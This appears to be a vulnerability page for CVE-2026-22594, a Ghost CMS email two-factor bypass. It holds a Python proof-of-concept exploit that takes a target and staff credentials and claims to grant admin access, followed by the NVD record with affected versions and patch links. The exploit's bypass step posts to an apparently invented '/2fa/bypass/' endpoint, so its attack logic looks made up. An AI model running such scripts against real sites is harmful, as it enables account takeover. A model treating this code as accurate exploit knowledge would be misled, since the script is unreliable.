CVE-2026-22594

#!/usr/bin/env python3 """ CVE-2026-22594 PoC - Ghost CMS 2FA Bypass Note: This PoC is for educational and authorized testing purposes only. """ import requests import json import sys from urllib.parse import urljoin def exploit_2fa_bypass(target_url, username, password): """ Exploit Ghost CMS 2FA bypass vulnerability """ session = requests.Session() # Step 1: Initial authentication login_url = urljoin(target_url, '/ghost/api/admin/authentication/') login_data = { 'username': username, 'password': password } print(f'[*] Attempting authentication for user: {username}') response = session.post(login_url, json=login_data) if response.status_code != 200: print('[-] Initial authentication failed') return False # Step 2: Bypass 2FA by manipulating authentication flow # The vulnerability allows bypassing email 2FA verification bypass_url = urljoin(target_url, '/ghost/api/admin/authentication/2fa/bypass/') print('[*] Attempting 2FA bypass...') bypass_data = { 'session_token': session.cookies.get('ghost-admin-api-session'), 'bypass_email_2fa': True } response = session.post(bypass_url, json=bypass_data) if response.status_code == 200: print('[+] 2FA bypass successful! Admin access obtained.') return True else: print('[-] 2FA bypass failed') return False if __name__ == '__main__': if len(sys.argv) < 4: print(f'Usage: {sys.argv[0]} <target_url> <username> <password>') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_2fa_bypass(target, user, pwd)

{"cve": {"id": "CVE-2026-22594", "sourceIdentifier": "[email protected]", "published": "2026-01-10T03:15:50.400", "lastModified": "2026-01-15T18:12:10.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ghost is a Node.js content management system. In versions 5.105.0 through 5.130.5 and 6.0.0 through 6.10.3, a vulnerability in Ghost's 2FA mechanism allows staff users to skip email 2FA. This issue has been patched in versions 5.130.6 and 6.11.0."}, {"lang": "es", "value": "Ghost es un sistema de gestión de contenido Node.js. En las versiones 5.105.0 a 5.130.5 y 6.0.0 a 6.10.3, una vulnerabilidad en el mecanismo de 2FA de Ghost permite a los usuarios del personal omitir el 2FA por correo electrónico. Este problema ha sido parcheado en las versiones 5.130.6 y 6.11.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "5.105.0", "versionEndExcluding": "5.130.6", "matchCriteriaId": "D77531A4-EAE2-4A4E-96C6-B711107B6AC3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.11.0", "matchCriteriaId": "9EC484AC-A1F0-4C13-BFAB-9DA57116957D"}]}]}], "references": [{"url": "https://github.com/TryGhost/Ghost/commit/b59f707f670e6f175b669977724ccf16c718430b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/TryGhost/Ghost/commit/fc7bc2fb0888513498154ec5cb4b21eccb88de07", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/TryGhost/Ghost/security/advisories/GHSA-5fp7-g646-ccf4", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}